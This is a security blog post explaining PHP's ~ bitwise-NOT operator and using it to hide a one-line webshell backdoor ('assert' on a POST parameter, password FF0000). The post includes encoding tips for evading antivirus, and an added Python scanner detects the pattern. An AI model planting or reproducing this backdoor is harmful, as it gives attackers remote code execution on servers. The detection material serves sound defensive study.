1) PHP ~ bitwise operator
PHP: Bitwise Operators - http://www.php.net/manual/zh/language.operators.bitwise.php
Some time ago, a foreign user on Twitter posted something interesting: a file containing what looked like a garbled string still printed 1337 normally when accessed. That led to the following research.
~ $a    Not (bitwise inversion): sets the bits that are 0 in $a to 1, and vice versa.
PHP's INI setting error_reporting uses bitwise values, which gives a real-world example of turning a single bit off. To display all errors except notices, php.ini uses: E_ALL & ~E_NOTICE
It works by first taking the value of E_ALL: 00000000000000000111011111111111
Then taking the value of E_NOTICE: 00000000000000000000000000001000
Then inverting it with ~: 11111111111111111111111111110111
Finally, bitwise AND (&) keeps only the bits that are set (1) in both values: 00000000000000000111011111110111
2) Analysis and reproduction
This is what the original code produced at the time:
On seeing this, the first thought was that it could be used to bypass a firewall, for example to implement a backdoor, and then I began to wonder what kind of encoding was involved.
Later, while testing with Li Pu Jun, we found that simply running echo ~'1' outputs the 'garbled' text directly. It only dawned on me after reading the official PHP explanation of the ~ operator.
Then we can start writing a one-line backdoor to try it out:
<?php
$x = ~ÿ¬¬º«;
$x($_POST[~¹¹ïïïï]);
?>
Here the $x variable is defined as assert, and the backdoor can then be connected to directly with the password FF0000, because inverting the 'garbled' bytes once more returns them to their normal values.
3) About encoding and antivirus evasion
When I reproduced this backdoor, I found that copying it over directly resulted in an HTTP 500 status. The cause was an encoding problem: the 'garbled' text above is in fact Western European (ISO-8859-15).
In practice we ran into several backdoors that could not be connected to and returned a 500 error, all because of this encoding problem. If the default encoding is not recognized, saving the file in this encoding works (GBK, UTF-8 ... cannot be used successfully).
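For defenders, a static check for the pattern described above, as an added example that is not part of the original article. It scans the raw bytes of a PHP file (not decoded text, since the file is saved in a single-byte encoding) for ~ applied to a run of high bytes, inverts them the way PHP does, and flags hidden function names. The name list, the function names and the sample input are assumptions constructed for illustration.

```python
import re

# Illustrative (assumed) list of callables worth a manual review when hidden.
SUSPICIOUS = {b"assert", b"eval", b"system", b"exec", b"passthru",
              b"shell_exec", b"create_function", b"popen", b"proc_open"}

# "~" followed by a run of bytes >= 0x80, either bare or quoted.
NOT_RUN = re.compile(rb"~\s*(['\"]?)([\x80-\xff]{2,})\1")


def invert(data: bytes) -> bytes:
    """PHP's ~ on a string flips every bit of every byte."""
    return bytes(b ^ 0xFF for b in data)


def scan(source: bytes):
    """Return (line_no, decoded_text, is_suspicious) for each ~<high bytes> run."""
    findings = []
    for m in NOT_RUN.finditer(source):
        decoded = invert(m.group(2))          # high bytes always decode to ASCII
        line_no = source.count(b"\n", 0, m.start()) + 1
        findings.append((line_no, decoded.decode("ascii"),
                         decoded.lower() in SUSPICIOUS))
    return findings


# Constructed sample: one hidden callable name and one harmless inverted string.
SAMPLE = (b"<?php\n"
          b"$x = ~" + invert(b"assert") + b";\n"
          b"echo ~" + invert(b"1337") + b";\n")

if __name__ == "__main__":
    for line_no, text, bad in scan(SAMPLE):
        print(f"line {line_no}: ~ decodes to {text!r}"
              f"{'  <-- hidden callable name' if bad else ''}")
```

Any hit deserves a look even when the decoded text is not in the list, because legitimate PHP code has little reason to apply ~ to a string of non-ASCII bytes.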
AUTHOR:EVI1M0 [email:evi1m0#ff0000.cc]
From: Evil Red information Security organization [FF0000 team]